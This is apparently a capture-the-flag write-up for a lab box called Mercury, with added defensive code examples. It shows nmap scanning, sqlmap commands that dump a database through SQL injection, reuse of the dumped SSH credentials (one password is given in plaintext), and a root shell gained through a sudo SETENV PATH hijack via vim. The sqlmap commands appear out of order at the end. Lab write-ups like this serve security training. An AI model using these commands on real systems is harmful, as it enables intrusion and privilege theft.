Mercury
Mercury is defined as an easy box with no brute forcing. Lets check it out.
```
nmap -A -vv 192.168.50.70
Starting Nmap 7.93 ( ) at 2022-11-12 16:04 PST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating Ping Scan at 16:04
Scanning 192.168.50.70 [2 ports]
Completed Ping Scan at 16:04, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:04
Completed Parallel DNS resolution of 1 host. at 16:04, 0.00s elapsed
Initiating Connect Scan at 16:04
Scanning mercury (192.168.50.70) [1000 ports]
Discovered open port 22/tcp on 192.168.50.70
Discovered open port 8080/tcp on 192.168.50.70
Completed Connect Scan at 16:04, 0.07s elapsed (1000 total ports)
Initiating Service scan at 16:04
Scanning 2 services on mercury (192.168.50.70)
Completed Service scan at 16:05, 91.18s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.50.70.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:05
Completed NSE at 16:05, 0.16s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:05
Completed NSE at 16:05, 1.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:05
Completed NSE at 16:05, 0.00s elapsed
Nmap scan report for mercury (192.168.50.70)
Host is up, received conn-refused (0.00036s latency).
Scanned at 2022-11-12 16:04:11 PST for 92s
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE    REASON  VERSION
22/tcp   open  ssh        syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c824ea2a2bf13cfa169465bdc79b6c29 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCv2kWy2C3yUkz42v3fw7LeUhH6rqOhQqqU4KNMv3Hh/25dEI3F1+BrJlimrVxH3B7WNoyAS205KACPRmvyI4I27yyXfMZ1E15D94+ZNfSE/6dG5qFNxUuJzPeVZVg3Rr2A4qMULAGQUqZAhd0vdb4QX3LyseGkigqn1POhL5wTTRCXrgAr8iWPqJxIt0AJQQvIvSZkwzHVxn1Bn7+/FMKGjimGujAIWg2GFPk1FHPjULQWgEcPCUO0z4lgaHAqZCr9xG3iSYESh0XCQnxpZA2PgrgMpaDr2QR/tklK1hRpg+eylg20UlWVPzg5BRAA+uyX3Qax3K6BCPokTSPXwN13qfgeu95G1cdE4OJhy7ENpiP/M01hfCi6cy+PhhgpN0UwbSaO1UmvmAgJjcJbHbD5hk9xuHbuzhiWdUj02ftGKwS4qG9f2EhIKwy95RKseq3p2rH9K0H8rLMRqSP9pQ8CF5aynHsdCZtWWYWh/2licfzvm0xLwAuTBljDmqicSH8=
|   256 e808a18e7d5abc5c66164824570dfab8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPRFXRHxQ1CAUIiG81tUpJAjV4KTvplX+pdVuqHW68CGXyVwTxPQq01UM2e7IXiYdB0oXsXn7YQAa2ti2y6FUxA=
|   256 2f187e1054f7b917a2111d8fb330a52a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEA7N/wSYGrz/Nb9cd1KwzZfsScvv9FX1naKAxVg/Wog
8080/tcp open  http-proxy syn-ack WSGIServer/0.2 CPython/3.8.2
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
| http-robots.txt: 1 disallowed entry 
|_/
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Date: Sun, 13 Nov 2022 00:04:18 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html
|     X-Frame-Options: DENY
|     Content-Length: 2366
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta http-equiv="content-type" content="text/html; charset=utf-8">
|     <title>Page not found at /nice ports,/Trinity.txt.bak</title>
|     <meta name="robots" content="NONE,NOARCHIVE">
|     <style type="text/css">
|     html * { padding:0; margin:0; }
|     body * { padding:10px 20px; }
|     body * * { padding:0; }
|     body { font:small sans-serif; background:#eee; color:#000; }
|     body>div { border-bottom:1px solid #ddd; }
|     font-weight:normal; margin-bottom:.4em; }
|     span { font-size:60%; color:#666; font-weight:normal; }
|     table { border:none; border-collapse: collapse; width:100%; }
|     vertical-align:
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Sun, 13 Nov 2022 00:04:18 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html; charset=utf-8
|     X-Frame-Options: DENY
|     Content-Length: 69
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     Hello. This site is currently in development please check back later.
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
SF-Port8080-TCP:V=7.93%I=7%D=11/12%Time=63703481%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sun,\x2013\x20Nov\x20
SF:2022\x2000:04:18\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.8\.
SF:2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options:\x
SF:20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nosniff
SF:\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\x20is\
SF:x20currently\x20in\x20development\x20please\x20check\x20back\x20later\.
SF:")%r(HTTPOptions,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sun,\x2013\x20
SF:Nov\x202022\x2000:04:18\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython
SF:/3\.8\.2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Opt
SF:ions:\x20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20no
SF:sniff\r\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site
SF:\x20is\x20currently\x20in\x20development\x20please\x20check\x20back\x20
SF:later\.")%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//D
SF:TD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\"
SF:\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20con
SF:tent=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<tit
SF:le>Error\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20
SF:<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20version\x20\('RTSP
SF:/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20exp
SF:lanation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20request\x20syntax\x
SF:20or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n</html>
SF:")%r(FourOhFourRequest,A28,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x
SF:20Sun,\x2013\x20Nov\x202022\x2000:04:18\x20GMT\r\nServer:\x20WSGIServer
SF:/0\.2\x20CPython/3\.8\.2\r\nContent-Type:\x20text/html\r\nX-Frame-Optio
SF:ns:\x20DENY\r\nContent-Length:\x202366\r\nX-Content-Type-Options:\x20no
SF:sniff\r\nReferrer-Policy:\x20same-origin\r\n\r\n<!DOCTYPE\x20html>\n<ht
SF:ml\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20http-equiv=\"content-type\
SF:"\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20<title>Page\x20n
SF:ot\x20found\x20at\x20/nice\x20ports,/Trinity\.txt\.bak</title>\n\x20\x2
SF:0<meta\x20name=\"robots\"\x20content=\"NONE,NOARCHIVE\">\n\x20\x20<styl
SF:e\x20type=\"text/css\">\n\x20\x20\x20\x20html\x20\*\x20{\x20padding:0;\
SF:x20margin:0;\x20}\n\x20\x20\x20\x20body\x20\*\x20{\x20padding:10px\x202
SF:0px;\x20}\n\x20\x20\x20\x20body\x20\*\x20\*\x20{\x20padding:0;\x20}\n\x
SF:20\x20\x20\x20body\x20{\x20font:small\x20sans-serif;\x20background:#eee
SF:;\x20color:#000;\x20}\n\x20\x20\x20\x20body>div\x20{\x20border-bottom:1
SF:px\x20solid\x20#ddd;\x20}\n\x20\x20\x20\x20h1\x20{\x20font-weight:norma
SF:l;\x20margin-bottom:\.4em;\x20}\n\x20\x20\x20\x20h1\x20span\x20{\x20fon
SF:t-size:60%;\x20color:#666;\x20font-weight:normal;\x20}\n\x20\x20\x20\x2
SF:0table\x20{\x20border:none;\x20border-collapse:\x20collapse;\x20width:1
SF:00%;\x20}\n\x20\x20\x20\x20td,\x20th\x20{\x20vertical-align:");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:05
Completed NSE at 16:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:05
Completed NSE at 16:05, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:05
Completed NSE at 16:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 92.84 seconds
```
Did a gobuster scan and found /robots.txt.
It disallowed a /* directory, which led me to this page:
Let's look at mercuryfacts/
I spy with my little eye SQLi:
Oh yeah! Let's reveal what's in that mercury database.
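To show what makes the mercuryfacts lookup dumpable, here is an added example (it is not code from the writeup or from the box's application, whose source is not on the page). It models a "fact by id" endpoint over an in-memory sqlite3 table with constructed rows: the first version splices the id into the SQL text, which is the bug class sqlmap found; the second validates the id and passes it as a bound parameter. The table layout and function names are assumptions.

```python
"""Added example: string-built SQL beside its parameterized replacement.

Everything here is constructed; the box's real schema and view are unknown.
"""
import sqlite3


def build_db():
    """Constructed stand-in for the 'mercury' database (two sample facts)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE facts (id INTEGER PRIMARY KEY, fact TEXT)")
    conn.executemany(
        "INSERT INTO facts VALUES (?, ?)",
        [(1, "Mercury is the smallest planet."), (2, "Mercury has no moons.")],
    )
    return conn


def fact_vulnerable(conn, fact_id):
    """Assumed shape of the bug: the untrusted id is formatted into the query,
    so whatever the client sends becomes part of the SQL statement."""
    query = f"SELECT fact FROM facts WHERE id = {fact_id}"
    return [row[0] for row in conn.execute(query)]


def fact_safe(conn, fact_id):
    """Hardened form: the id must be a non-negative integer, and it travels to
    the driver as a bound parameter, never as SQL text."""
    if not str(fact_id).isdigit():
        raise ValueError("fact id must be a non-negative integer")
    rows = conn.execute("SELECT fact FROM facts WHERE id = ?", (int(fact_id),))
    return [row[0] for row in rows]


def demo():
    """Run both versions on a benign id and on a tautology (the simplest input
    a scanner sends to test whether the WHERE clause can be rewritten)."""
    conn = build_db()
    benign, hostile = "1", "1 OR 1=1"
    result = {
        "vulnerable_benign": fact_vulnerable(conn, benign),   # one row
        "vulnerable_hostile": fact_vulnerable(conn, hostile), # every row
        "safe_benign": fact_safe(conn, benign),               # one row
    }
    try:
        fact_safe(conn, hostile)
        result["safe_hostile"] = "accepted"
    except ValueError:
        result["safe_hostile"] = "rejected"
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The tautology returns the whole table from the vulnerable lookup, which is the same mechanism sqlmap extends to read other tables once it has confirmed the injection point. Binding the parameter is the fix; the integer check on top of it turns a malformed id into a clean 4xx instead of a query.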
We know from the nmap scan that SSH is open. I'll skip the first users in the dump and try webmaster.
Yep, that worked, and we have the user flag.
ls -ll shows a notes.txt file, so let's cat that out.
Well, we already have webmaster's password.
linuxmaster's password looks like base64, so let's decode it.
Ok, now we ssh in as linuxmaster.
Successfully logged in via ssh with linuxmaster:mercurymeandiameteris4880km
sudo -l shows:
```
linuxmaster@mercury:/usr/bin$ sudo -l
Matching Defaults entries for linuxmaster on mercury:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User linuxmaster may run the following commands on mercury:
    (root : root) SETENV: /usr/bin/check_syslog.sh
linuxmaster@mercury:/usr/bin$
```
Looks like we can run /usr/bin/check_syslog.sh as root, which is a bash script:
```
linuxmaster@mercury:/usr/bin$ cat check_syslog.sh
#!/bin/bash
tail -n 10 /var/log/syslog
linuxmaster@mercury:/usr/bin$
```
My first thought was to overwrite that script and gain root that way, but it isn't writable. Of course it wouldn't be that easy. The script calls tail by bare name, though, and the SETENV tag lets us hand sudo our own PATH, so let's symlink tail to vim and put our directory first in PATH:
```bash
ln -s /usr/bin/vim tail
export PATH=$(pwd):$PATH
```
Then run the script through sudo, preserving PATH:
```bash
sudo --preserve-env=PATH /usr/bin/check_syslog.sh
```
vim opens as root; run :!/bin/bash from inside it and we have a root shell!
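The root cause above is the pairing of a SETENV sudo rule with a script that resolves a command through PATH, which is what lets the caller's PATH win over the secure_path default. As an added example (not part of the writeup or of the box), here is a small audit that takes `sudo -l` output and the text of each target script and flags exactly that combination, then shows that a hardened version of check_syslog.sh passes. The sudo -l text is copied from the writeup; the hardened script body, the helper names and the list of shell builtins are my assumptions.

```python
"""Added example: flag sudo rules where SETENV meets a PATH-resolved command.

Inputs are constructed samples; the rule and the original script match the
writeup, the hardened script is an assumed fix.
"""
import re
import shlex

# Constructed: the rule block exactly as sudo -l printed it on the box.
SUDO_L_OUTPUT = """\
User linuxmaster may run the following commands on mercury:
    (root : root) SETENV: /usr/bin/check_syslog.sh
"""

# Constructed: the script as found on the box (tail resolved via PATH).
SCRIPT_AS_FOUND = """\
#!/bin/bash
tail -n 10 /var/log/syslog
"""

# Constructed: the assumed fix, PATH pinned and the binary fully qualified.
SCRIPT_HARDENED = """\
#!/bin/bash
PATH=/usr/bin:/bin
/usr/bin/tail -n 10 /var/log/syslog
"""

# One rule line: "(runas) TAG: TAG: cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

# Words that are shell syntax, not executables looked up on PATH (assumed list).
SHELL_BUILTINS = {"if", "then", "else", "elif", "fi", "for", "while", "do", "done",
                  "exit", "export", "cd", "echo", "set", "[", "[[", "test",
                  "return", "local", "read", "shift"}


def parse_sudo_rules(text):
    """Return (runas, tags, command) for each rule line of `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), tags, cmd.strip()))
    return rules


def unqualified_commands(script):
    """Commands the script invokes by bare name, i.e. resolved through PATH."""
    found = []
    for line in script.splitlines():
        line = line.split("#", 1)[0].strip()  # drops comments and the shebang
        if not line:
            continue
        for segment in re.split(r"\s*(?:\|\||&&|;|\|)\s*", line):
            try:
                words = shlex.split(segment)
            except ValueError:
                continue
            while words and re.match(r"^[A-Za-z_]\w*=", words[0]):
                words.pop(0)  # leading VAR=value assignments are not commands
            if not words:
                continue
            cmd = words[0]
            if cmd in SHELL_BUILTINS or cmd.startswith(("/", "./")):
                continue
            found.append(cmd)
    return found


def pins_path(script):
    """True if the script sets PATH itself instead of trusting the caller's."""
    return re.search(r"^\s*(export\s+)?PATH=", script, re.MULTILINE) is not None


def audit(sudo_l_text, script_bodies):
    """Findings: SETENV rules whose target runs a PATH-resolved command
    without pinning PATH. `script_bodies` maps rule path to file contents."""
    findings = []
    for runas, tags, cmd in parse_sudo_rules(sudo_l_text):
        if "SETENV" not in tags:
            continue
        body = script_bodies.get(cmd)
        if body is None:
            continue
        bare = unqualified_commands(body)
        if bare and not pins_path(body):
            findings.append({"rule": cmd, "runas": runas, "bare_commands": bare})
    return findings


if __name__ == "__main__":
    print("as found: ", audit(SUDO_L_OUTPUT, {"/usr/bin/check_syslog.sh": SCRIPT_AS_FOUND}))
    print("hardened: ", audit(SUDO_L_OUTPUT, {"/usr/bin/check_syslog.sh": SCRIPT_HARDENED}))
```

Either fix on its own would have closed this path (pinning PATH inside the script, or calling /usr/bin/tail directly), and the cleanest fix is to drop SETENV from the rule as well, since the script has no reason to accept environment from its caller.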
Pretty cool! If you run linpeas you will see that there are a couple of different ways to root this machine. Perhaps an easier way is with CVE-2021-4034.
Up next is Venus.
Interesting. Click "Load a fact."
```bash
sqlmap -u --dbs --batch
sqlmap -u http://192.168.50.70:8080/mercuryfacts -D mercury --dump-all --batch
```